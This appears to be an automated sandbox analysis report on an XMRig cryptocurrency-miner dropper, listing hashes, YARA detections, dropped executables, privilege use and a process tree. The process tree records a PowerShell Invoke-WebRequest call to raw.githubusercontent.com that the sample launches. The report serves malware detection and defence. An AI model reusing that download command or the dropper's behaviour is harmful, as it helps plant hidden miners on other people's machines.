xmrig | a8f725d943e9f868a964ee4e67e4d1a5621b420f4faba151558695779e898776

Analysis

max time kernel
94s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
09/05/2024, 00:11

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

a83a4712be710c2cce922a985b13aec0_NEIKI.exe
Size

3.2MB
MD5

a83a4712be710c2cce922a985b13aec0
SHA1

c91e0c36134462849ad072103627565e96594060
SHA256

a8f725d943e9f868a964ee4e67e4d1a5621b420f4faba151558695779e898776
SHA512

2d08f5e1d18af0b992e16c56d9822e52d0e1949d75d95f73e4e10d0096f8bcdd9f1dc5f2bb58e248cd4afdd6c2a5fbbc41b26185b78b8dff48d852aa5f0b4972
SSDEEP

98304:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrWG:SbBeSFkK

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/372-0-0x00007FF743240000-0x00007FF743636000-memory.dmp	xmrig
behavioral2/files/0x0008000000022f51-6.dat	xmrig
behavioral2/files/0x00080000000233e8-11.dat	xmrig
behavioral2/files/0x00080000000233eb-10.dat	xmrig
behavioral2/files/0x00080000000233ed-30.dat	xmrig
behavioral2/files/0x00070000000233ee-41.dat	xmrig
behavioral2/memory/2024-45-0x00007FF602080000-0x00007FF602476000-memory.dmp	xmrig
behavioral2/memory/3556-52-0x00007FF722F60000-0x00007FF723356000-memory.dmp	xmrig
behavioral2/files/0x00070000000233f1-60.dat	xmrig
behavioral2/memory/4092-65-0x00007FF6798A0000-0x00007FF679C96000-memory.dmp	xmrig
behavioral2/memory/2624-66-0x00007FF625B80000-0x00007FF625F76000-memory.dmp	xmrig
behavioral2/memory/1096-72-0x00007FF7AB2D0000-0x00007FF7AB6C6000-memory.dmp	xmrig
behavioral2/memory/2852-74-0x00007FF6DDDC0000-0x00007FF6DE1B6000-memory.dmp	xmrig
behavioral2/memory/688-75-0x00007FF764BE0000-0x00007FF764FD6000-memory.dmp	xmrig
behavioral2/files/0x00080000000233e9-86.dat	xmrig
behavioral2/files/0x00070000000233f6-98.dat	xmrig
behavioral2/files/0x00070000000233fb-121.dat	xmrig
behavioral2/files/0x00070000000233fe-136.dat	xmrig
behavioral2/files/0x0007000000023403-169.dat	xmrig
behavioral2/files/0x0007000000023408-186.dat	xmrig
behavioral2/files/0x0007000000023406-184.dat	xmrig
behavioral2/files/0x0007000000023407-181.dat	xmrig
behavioral2/files/0x0007000000023405-179.dat	xmrig
behavioral2/files/0x0007000000023404-174.dat	xmrig
behavioral2/files/0x0007000000023402-164.dat	xmrig
behavioral2/files/0x0007000000023401-159.dat	xmrig
behavioral2/files/0x0007000000023400-154.dat	xmrig
behavioral2/files/0x00070000000233ff-149.dat	xmrig
behavioral2/files/0x00070000000233fd-139.dat	xmrig
behavioral2/files/0x00070000000233fc-134.dat	xmrig
behavioral2/files/0x00070000000233fa-124.dat	xmrig
behavioral2/files/0x00070000000233f9-119.dat	xmrig
behavioral2/files/0x00070000000233f8-114.dat	xmrig
behavioral2/files/0x00070000000233f7-107.dat	xmrig
behavioral2/files/0x00070000000233f5-96.dat	xmrig
behavioral2/files/0x00070000000233f4-92.dat	xmrig
behavioral2/files/0x00070000000233f3-82.dat	xmrig
behavioral2/memory/1680-73-0x00007FF74FA50000-0x00007FF74FE46000-memory.dmp	xmrig
behavioral2/files/0x00070000000233f2-70.dat	xmrig
behavioral2/memory/1144-67-0x00007FF72B960000-0x00007FF72BD56000-memory.dmp	xmrig
behavioral2/files/0x00070000000233f0-62.dat	xmrig
behavioral2/memory/4568-57-0x00007FF7C22C0000-0x00007FF7C26B6000-memory.dmp	xmrig
behavioral2/files/0x00070000000233ef-55.dat	xmrig
behavioral2/files/0x00080000000233ec-48.dat	xmrig
behavioral2/memory/440-822-0x00007FF7CD8B0000-0x00007FF7CDCA6000-memory.dmp	xmrig
behavioral2/memory/5064-824-0x00007FF6C5700000-0x00007FF6C5AF6000-memory.dmp	xmrig
behavioral2/memory/4076-823-0x00007FF690850000-0x00007FF690C46000-memory.dmp	xmrig
behavioral2/memory/3724-828-0x00007FF7308B0000-0x00007FF730CA6000-memory.dmp	xmrig
behavioral2/memory/1792-833-0x00007FF7B44A0000-0x00007FF7B4896000-memory.dmp	xmrig
behavioral2/memory/2076-839-0x00007FF7BC370000-0x00007FF7BC766000-memory.dmp	xmrig
behavioral2/memory/3188-841-0x00007FF6ED9F0000-0x00007FF6EDDE6000-memory.dmp	xmrig
behavioral2/memory/3736-848-0x00007FF745A10000-0x00007FF745E06000-memory.dmp	xmrig
behavioral2/memory/3224-853-0x00007FF6942D0000-0x00007FF6946C6000-memory.dmp	xmrig
behavioral2/memory/4708-854-0x00007FF61FC30000-0x00007FF620026000-memory.dmp	xmrig
behavioral2/memory/4552-844-0x00007FF761DD0000-0x00007FF7621C6000-memory.dmp	xmrig
behavioral2/memory/2160-857-0x00007FF6BC150000-0x00007FF6BC546000-memory.dmp	xmrig
behavioral2/memory/4544-861-0x00007FF6078A0000-0x00007FF607C96000-memory.dmp	xmrig
behavioral2/memory/2536-869-0x00007FF76E080000-0x00007FF76E476000-memory.dmp	xmrig
behavioral2/memory/2624-2187-0x00007FF625B80000-0x00007FF625F76000-memory.dmp	xmrig
behavioral2/memory/1144-2188-0x00007FF72B960000-0x00007FF72BD56000-memory.dmp	xmrig
behavioral2/memory/2024-2189-0x00007FF602080000-0x00007FF602476000-memory.dmp	xmrig
behavioral2/memory/1096-2190-0x00007FF7AB2D0000-0x00007FF7AB6C6000-memory.dmp	xmrig
behavioral2/memory/3556-2191-0x00007FF722F60000-0x00007FF723356000-memory.dmp	xmrig
behavioral2/memory/4568-2192-0x00007FF7C22C0000-0x00007FF7C26B6000-memory.dmp	xmrig

Blocklisted process makes network request 7 IoCs

flow	pid	Process
3	4892	powershell.exe
5	4892	powershell.exe
9	4892	powershell.exe
10	4892	powershell.exe
12	4892	powershell.exe
14	4892	powershell.exe
15	4892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4892	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1144	LcPjckw.exe
2024	GnGzNKF.exe
1096	cmZJDWh.exe
3556	imKQJyT.exe
4568	iAVBuXi.exe
4092	yMwyVAd.exe
1680	unpYaUZ.exe
2852	ZrWmHkx.exe
688	SkWcSCx.exe
2624	XgWkpzV.exe
440	TtEFGKW.exe
4076	RMEYXUZ.exe
5064	JxflSik.exe
3724	yGdygFi.exe
1792	GTouXsW.exe
2076	AvDNxYZ.exe
3188	dWsuZZw.exe
4552	WOfxKPI.exe
3736	hELwtBx.exe
3224	KLQklVP.exe
4708	KXPzooO.exe
2160	ySKQRkp.exe
4544	NDhHGYr.exe
2536	foZuQGB.exe
2704	EZxnSyh.exe
1104	ndECkKj.exe
4532	uZudgbu.exe
4728	xvDXxCI.exe
4372	ySBTsDy.exe
532	kgtHQtO.exe
3700	zYmxDhK.exe
3376	HmuCmju.exe
2376	SEmJOkR.exe
1516	CPPNPoM.exe
5044	wiWFsMr.exe
2668	oxHSTss.exe
4260	pORPXAf.exe
1080	BQZGvKX.exe
5004	kQcFxjQ.exe
2516	pWULHJg.exe
1984	edXHlXH.exe
2384	pTICUJK.exe
2056	eOJQJvJ.exe
2648	TZbCjMG.exe
2720	khdcgXs.exe
4812	AwskqAo.exe
1736	jnktShc.exe
4268	YUiYEIe.exe
636	gilvXEB.exe
2620	ZQFFOpZ.exe
984	RTukStt.exe
2020	pLapDrm.exe
2968	LaCyDYp.exe
700	gWKDepv.exe
1340	cvMtBMK.exe
2080	LBcuisa.exe
1060	CuwZMqK.exe
3540	RcpksKn.exe
2000	aWdQUZc.exe
3444	qVIpzRE.exe
780	NkzqthD.exe
4872	awvHqVp.exe
4604	TIBTdoU.exe
2280	CLcOKiI.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/372-0-0x00007FF743240000-0x00007FF743636000-memory.dmp	upx
behavioral2/files/0x0008000000022f51-6.dat	upx
behavioral2/files/0x00080000000233e8-11.dat	upx
behavioral2/files/0x00080000000233eb-10.dat	upx
behavioral2/files/0x00080000000233ed-30.dat	upx
behavioral2/files/0x00070000000233ee-41.dat	upx
behavioral2/memory/2024-45-0x00007FF602080000-0x00007FF602476000-memory.dmp	upx
behavioral2/memory/3556-52-0x00007FF722F60000-0x00007FF723356000-memory.dmp	upx
behavioral2/files/0x00070000000233f1-60.dat	upx
behavioral2/memory/4092-65-0x00007FF6798A0000-0x00007FF679C96000-memory.dmp	upx
behavioral2/memory/2624-66-0x00007FF625B80000-0x00007FF625F76000-memory.dmp	upx
behavioral2/memory/1096-72-0x00007FF7AB2D0000-0x00007FF7AB6C6000-memory.dmp	upx
behavioral2/memory/2852-74-0x00007FF6DDDC0000-0x00007FF6DE1B6000-memory.dmp	upx
behavioral2/memory/688-75-0x00007FF764BE0000-0x00007FF764FD6000-memory.dmp	upx
behavioral2/files/0x00080000000233e9-86.dat	upx
behavioral2/files/0x00070000000233f6-98.dat	upx
behavioral2/files/0x00070000000233fb-121.dat	upx
behavioral2/files/0x00070000000233fe-136.dat	upx
behavioral2/files/0x0007000000023403-169.dat	upx
behavioral2/files/0x0007000000023408-186.dat	upx
behavioral2/files/0x0007000000023406-184.dat	upx
behavioral2/files/0x0007000000023407-181.dat	upx
behavioral2/files/0x0007000000023405-179.dat	upx
behavioral2/files/0x0007000000023404-174.dat	upx
behavioral2/files/0x0007000000023402-164.dat	upx
behavioral2/files/0x0007000000023401-159.dat	upx
behavioral2/files/0x0007000000023400-154.dat	upx
behavioral2/files/0x00070000000233ff-149.dat	upx
behavioral2/files/0x00070000000233fd-139.dat	upx
behavioral2/files/0x00070000000233fc-134.dat	upx
behavioral2/files/0x00070000000233fa-124.dat	upx
behavioral2/files/0x00070000000233f9-119.dat	upx
behavioral2/files/0x00070000000233f8-114.dat	upx
behavioral2/files/0x00070000000233f7-107.dat	upx
behavioral2/files/0x00070000000233f5-96.dat	upx
behavioral2/files/0x00070000000233f4-92.dat	upx
behavioral2/files/0x00070000000233f3-82.dat	upx
behavioral2/memory/1680-73-0x00007FF74FA50000-0x00007FF74FE46000-memory.dmp	upx
behavioral2/files/0x00070000000233f2-70.dat	upx
behavioral2/memory/1144-67-0x00007FF72B960000-0x00007FF72BD56000-memory.dmp	upx
behavioral2/files/0x00070000000233f0-62.dat	upx
behavioral2/memory/4568-57-0x00007FF7C22C0000-0x00007FF7C26B6000-memory.dmp	upx
behavioral2/files/0x00070000000233ef-55.dat	upx
behavioral2/files/0x00080000000233ec-48.dat	upx
behavioral2/memory/440-822-0x00007FF7CD8B0000-0x00007FF7CDCA6000-memory.dmp	upx
behavioral2/memory/5064-824-0x00007FF6C5700000-0x00007FF6C5AF6000-memory.dmp	upx
behavioral2/memory/4076-823-0x00007FF690850000-0x00007FF690C46000-memory.dmp	upx
behavioral2/memory/3724-828-0x00007FF7308B0000-0x00007FF730CA6000-memory.dmp	upx
behavioral2/memory/1792-833-0x00007FF7B44A0000-0x00007FF7B4896000-memory.dmp	upx
behavioral2/memory/2076-839-0x00007FF7BC370000-0x00007FF7BC766000-memory.dmp	upx
behavioral2/memory/3188-841-0x00007FF6ED9F0000-0x00007FF6EDDE6000-memory.dmp	upx
behavioral2/memory/3736-848-0x00007FF745A10000-0x00007FF745E06000-memory.dmp	upx
behavioral2/memory/3224-853-0x00007FF6942D0000-0x00007FF6946C6000-memory.dmp	upx
behavioral2/memory/4708-854-0x00007FF61FC30000-0x00007FF620026000-memory.dmp	upx
behavioral2/memory/4552-844-0x00007FF761DD0000-0x00007FF7621C6000-memory.dmp	upx
behavioral2/memory/2160-857-0x00007FF6BC150000-0x00007FF6BC546000-memory.dmp	upx
behavioral2/memory/4544-861-0x00007FF6078A0000-0x00007FF607C96000-memory.dmp	upx
behavioral2/memory/2536-869-0x00007FF76E080000-0x00007FF76E476000-memory.dmp	upx
behavioral2/memory/2624-2187-0x00007FF625B80000-0x00007FF625F76000-memory.dmp	upx
behavioral2/memory/1144-2188-0x00007FF72B960000-0x00007FF72BD56000-memory.dmp	upx
behavioral2/memory/2024-2189-0x00007FF602080000-0x00007FF602476000-memory.dmp	upx
behavioral2/memory/1096-2190-0x00007FF7AB2D0000-0x00007FF7AB6C6000-memory.dmp	upx
behavioral2/memory/3556-2191-0x00007FF722F60000-0x00007FF723356000-memory.dmp	upx
behavioral2/memory/4568-2192-0x00007FF7C22C0000-0x00007FF7C26B6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\wjlrCNo.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\bZaWwCp.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\lBwXYGr.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\ykzBAni.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\HMuPSFt.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\ZKuIRLw.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\JZOWQMh.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\PMHHkbx.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\JwZXoAk.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\yOQNsCu.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\qmSSusC.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\PrIejOO.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\KkpPNoC.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\LMNoxXB.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\oiqQDua.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\aPlfZJM.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\XThJHJR.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\RPDdDSS.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\cwRPQBL.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\lNZmIWC.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\cIxFzhD.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\AdszQMc.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\qFpVnit.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\Qsolmsn.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\fIuFSNh.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\IZAhVEx.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\WzYiiSr.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\YnDiTkx.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\TtEFGKW.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\jABCcwc.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\kOQNGXd.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\wcJEWbK.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\IDBDtLF.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\buKaPGK.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\UnVvMbq.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\LTRCPMh.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\kjRLIeR.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\BjULvyA.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\FoxmcvH.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\wFthWqs.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\cqKKiPG.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\dcBIROb.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\opunKCM.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\ieahhrX.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\wmoxEfK.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\tJghGxV.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\nTiIDko.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\FczWJzC.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\jefbXAI.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\jqWaHlV.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\imjaPWL.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\ewwxocJ.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\eOaMPlO.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\RQqZGBk.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\fqfaiRD.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\BSVKZsj.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\WOfxKPI.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\bDkMamo.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\jsWHLLF.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\QvCfxPD.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\SSBHsoS.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\NqHlXfd.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\LxtRbbJ.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
File created	C:\Windows\System\uzqqrNV.exe	a83a4712be710c2cce922a985b13aec0_NEIKI.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4892	powershell.exe
4892	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeLockMemoryPrivilege	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 372 wrote to memory of 4892	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	81
PID 372 wrote to memory of 4892	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	81
PID 372 wrote to memory of 1144	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	82
PID 372 wrote to memory of 1144	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	82
PID 372 wrote to memory of 2024	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	84
PID 372 wrote to memory of 2024	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	84
PID 372 wrote to memory of 1096	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	85
PID 372 wrote to memory of 1096	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	85
PID 372 wrote to memory of 3556	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	86
PID 372 wrote to memory of 3556	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	86
PID 372 wrote to memory of 4568	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	87
PID 372 wrote to memory of 4568	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	87
PID 372 wrote to memory of 4092	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	88
PID 372 wrote to memory of 4092	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	88
PID 372 wrote to memory of 1680	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	89
PID 372 wrote to memory of 1680	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	89
PID 372 wrote to memory of 2852	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	90
PID 372 wrote to memory of 2852	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	90
PID 372 wrote to memory of 688	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	91
PID 372 wrote to memory of 688	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	91
PID 372 wrote to memory of 2624	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	92
PID 372 wrote to memory of 2624	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	92
PID 372 wrote to memory of 440	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	93
PID 372 wrote to memory of 440	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	93
PID 372 wrote to memory of 4076	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	94
PID 372 wrote to memory of 4076	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	94
PID 372 wrote to memory of 5064	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	95
PID 372 wrote to memory of 5064	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	95
PID 372 wrote to memory of 3724	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	96
PID 372 wrote to memory of 3724	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	96
PID 372 wrote to memory of 1792	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	97
PID 372 wrote to memory of 1792	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	97
PID 372 wrote to memory of 2076	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	98
PID 372 wrote to memory of 2076	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	98
PID 372 wrote to memory of 3188	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	99
PID 372 wrote to memory of 3188	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	99
PID 372 wrote to memory of 4552	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	100
PID 372 wrote to memory of 4552	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	100
PID 372 wrote to memory of 3736	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	101
PID 372 wrote to memory of 3736	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	101
PID 372 wrote to memory of 3224	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	102
PID 372 wrote to memory of 3224	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	102
PID 372 wrote to memory of 4708	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	103
PID 372 wrote to memory of 4708	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	103
PID 372 wrote to memory of 2160	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	104
PID 372 wrote to memory of 2160	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	104
PID 372 wrote to memory of 4544	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	105
PID 372 wrote to memory of 4544	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	105
PID 372 wrote to memory of 2536	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	106
PID 372 wrote to memory of 2536	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	106
PID 372 wrote to memory of 2704	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	107
PID 372 wrote to memory of 2704	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	107
PID 372 wrote to memory of 1104	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	108
PID 372 wrote to memory of 1104	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	108
PID 372 wrote to memory of 4532	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	109
PID 372 wrote to memory of 4532	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	109
PID 372 wrote to memory of 4728	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	110
PID 372 wrote to memory of 4728	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	110
PID 372 wrote to memory of 4372	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	111
PID 372 wrote to memory of 4372	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	111
PID 372 wrote to memory of 532	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	112
PID 372 wrote to memory of 532	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	112
PID 372 wrote to memory of 3700	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	113
PID 372 wrote to memory of 3700	372	a83a4712be710c2cce922a985b13aec0_NEIKI.exe	113

C:\Users\Admin\AppData\Local\Temp\a83a4712be710c2cce922a985b13aec0_NEIKI.exe
"C:\Users\Admin\AppData\Local\Temp\a83a4712be710c2cce922a985b13aec0_NEIKI.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\System\LcPjckw.exe
  C:\Windows\System\LcPjckw.exe
  2⤵
  - Executes dropped EXE
  PID:1144
- C:\Windows\System\GnGzNKF.exe
  C:\Windows\System\GnGzNKF.exe
  2⤵
  - Executes dropped EXE
  PID:2024
- C:\Windows\System\cmZJDWh.exe
  C:\Windows\System\cmZJDWh.exe
  2⤵
  - Executes dropped EXE
  PID:1096
- C:\Windows\System\imKQJyT.exe
  C:\Windows\System\imKQJyT.exe
  2⤵
  - Executes dropped EXE
  PID:3556
- C:\Windows\System\iAVBuXi.exe
  C:\Windows\System\iAVBuXi.exe
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Windows\System\yMwyVAd.exe
  C:\Windows\System\yMwyVAd.exe
  2⤵
  - Executes dropped EXE
  PID:4092
- C:\Windows\System\unpYaUZ.exe
  C:\Windows\System\unpYaUZ.exe
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\Windows\System\ZrWmHkx.exe
  C:\Windows\System\ZrWmHkx.exe
  2⤵
  - Executes dropped EXE
  PID:2852
- C:\Windows\System\SkWcSCx.exe
  C:\Windows\System\SkWcSCx.exe
  2⤵
  - Executes dropped EXE
  PID:688
- C:\Windows\System\XgWkpzV.exe
  C:\Windows\System\XgWkpzV.exe
  2⤵
  - Executes dropped EXE
  PID:2624
- C:\Windows\System\TtEFGKW.exe
  C:\Windows\System\TtEFGKW.exe
  2⤵
  - Executes dropped EXE
  PID:440
- C:\Windows\System\RMEYXUZ.exe
  C:\Windows\System\RMEYXUZ.exe
  2⤵
  - Executes dropped EXE
  PID:4076
- C:\Windows\System\JxflSik.exe
  C:\Windows\System\JxflSik.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\yGdygFi.exe
  C:\Windows\System\yGdygFi.exe
  2⤵
  - Executes dropped EXE
  PID:3724
- C:\Windows\System\GTouXsW.exe
  C:\Windows\System\GTouXsW.exe
  2⤵
  - Executes dropped EXE
  PID:1792
- C:\Windows\System\AvDNxYZ.exe
  C:\Windows\System\AvDNxYZ.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\dWsuZZw.exe
  C:\Windows\System\dWsuZZw.exe
  2⤵
  - Executes dropped EXE
  PID:3188
- C:\Windows\System\WOfxKPI.exe
  C:\Windows\System\WOfxKPI.exe
  2⤵
  - Executes dropped EXE
  PID:4552
- C:\Windows\System\hELwtBx.exe
  C:\Windows\System\hELwtBx.exe
  2⤵
  - Executes dropped EXE
  PID:3736
- C:\Windows\System\KLQklVP.exe
  C:\Windows\System\KLQklVP.exe
  2⤵
  - Executes dropped EXE
  PID:3224
- C:\Windows\System\KXPzooO.exe
  C:\Windows\System\KXPzooO.exe
  2⤵
  - Executes dropped EXE
